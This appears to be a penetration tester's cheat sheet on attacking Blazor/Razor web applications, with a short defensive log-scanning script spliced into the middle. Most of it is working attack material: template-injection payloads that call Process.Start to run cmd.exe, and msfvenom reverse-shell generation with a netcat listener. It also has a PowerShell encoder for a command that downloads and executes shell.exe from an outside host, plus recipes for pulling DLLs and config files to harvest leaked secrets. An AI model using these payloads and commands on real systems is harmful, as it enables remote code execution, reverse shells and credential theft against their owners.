Blazor SSTI
@(2+2) <= Success
@() <= Success
@("{{code}}") <= Success
@ <= Success
@{} <= ERROR!
@{ <= ERROR!
@({}) <= ERROR!
@({{}}) <= ERROR!
@System.Diagnostics.Process.Start("cmd.exe","/c echo RCE > C:/Windows/Tasks/test.txt");
@(System.Diagnostics.Process.Start("cmd.exe","/c echo RCE > C:/Windows/Tasks/test2.txt"));
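The probe table above gives a compact signature set for defenders: `@(...)` expressions and `@Namespace.Type.Method(...)` calls are what a Razor engine evaluates, while a bare `@` is normal in e-mail addresses. The following added example (not from the original notes) runs that classification over constructed, URL-encoded form-field log lines and separates harmless text, syntax probes, and attempts that reference process-spawning APIs; the log format and field names are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log: "key=value" pairs, one request per line, with the
# submitted field value URL-encoded. Not taken from any real system.
SAMPLE_LOG = [
    "id=1 field=message value=hello+world",
    "id=2 field=message value=%40%282%2B2%29",              # decodes to @(2+2)
    "id=3 field=message value=%40System.Diagnostics.Process.Start%28%22cmd.exe%22%29",
    "id=4 field=email value=alice%40example.com",            # bare @, benign
    "id=5 field=message value=%40%7B%7D",                    # decodes to @{} (fails to compile, still a probe)
]

RAZOR_EXPR = re.compile(r"@\(")          # @( ... ) explicit expression
RAZOR_CODE_BLOCK = re.compile(r"@\{")    # @{ ... } code block
# @Identifier.Member.Member( ... ) : a qualified call rendered as an implicit expression
RAZOR_MEMBER_CALL = re.compile(r"@[A-Za-z_]\w*(?:\.[A-Za-z_]\w*)+\s*\(")
# API prefixes whose appearance inside a template expression indicates code execution intent
EXEC_APIS = ("System.Diagnostics.Process", "System.IO.", "System.Reflection")


def classify(value: str) -> str:
    """Return 'clean', 'probe' (Razor syntax present) or 'exec' (Razor call into an exec-capable API)."""
    if RAZOR_MEMBER_CALL.search(value) and any(api in value for api in EXEC_APIS):
        return "exec"
    if RAZOR_EXPR.search(value) or RAZOR_CODE_BLOCK.search(value) or RAZOR_MEMBER_CALL.search(value):
        return "probe"
    return "clean"


def scan(lines):
    """Decode each logged field value and return (id, verdict, decoded value) for every non-clean hit."""
    findings = []
    for line in lines:
        fields = dict(kv.split("=", 1) for kv in line.split())
        value = unquote_plus(fields.get("value", ""))
        verdict = classify(value)
        if verdict != "clean":
            findings.append((fields.get("id"), verdict, value))
    return findings


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Flagging is a detective control only; the fix is to never compile user-supplied text as a Razor template and to pass it to the view as model data, which Razor HTML-encodes.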
Blazor RCE
https://www.schtech.co.uk/razor-pages-ssti-rce/
attacker: .\hostname.ps1
victim: @System.Diagnostics.Process.Start("cmd.exe","/c powershell.exe -enc <BASE64>");
Exploit:
x64: msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.11.6.151 LPORT=4443 -f exe -o shell.exe
x86: msfvenom -p windows/shell_reverse_tcp LHOST=10.11.6.151 LPORT=4443 -f exe > shell.exe
nc -lvp 4443
# generatePayload.ps1 (run with: .\generatePayload.ps1)
$command = 'iwr -uri http://192.168.2.111/shell.exe -OutFile C:\Windows\Tasks\shell.exe; C:\Windows\Tasks\shell.exe'
# powershell -enc expects the command as base64 of its UTF-16LE (Unicode) bytes
$bytes = [System.Text.Encoding]::Unicode.GetBytes($command)
$encodedCommand = [Convert]::ToBase64String($bytes)
$encodedCommand
# paste the printed value in place of <BASE64>:
@System.Diagnostics.Process.Start("cmd.exe","/c powershell.exe -enc <BASE64>");
Blazor Parse DLL
> python blazor.py -u https://devtest-chat.tweppy.com/
> python blazor.py -l targets.txt
> python blazor.py -l targets.txt -o output.txt
Download DLL files and check for leaked secrets
> python download.py
> python download.py -f result
> find . -name "*.dll" | xargs -P $(nproc) -n 1 strings >> juicy
> nuclei -target juicy -tags token -es unknown -silent
Blazor Config Files
http://domain.com/appsettings.json
http://domain.com/appsettings.StageName.json
ffuf -w bbFuzzing.txt -u http://domain.com/FUZZ
Nuclei
> nuclei -u http://domain.com -tags blazor -silent
> nuclei -l targets.txt -silent
Nuclei Secrets
> getJS --url targets.txt --output secrets.txt
> nuclei -l secrets.txt -tags token -es unknown -silent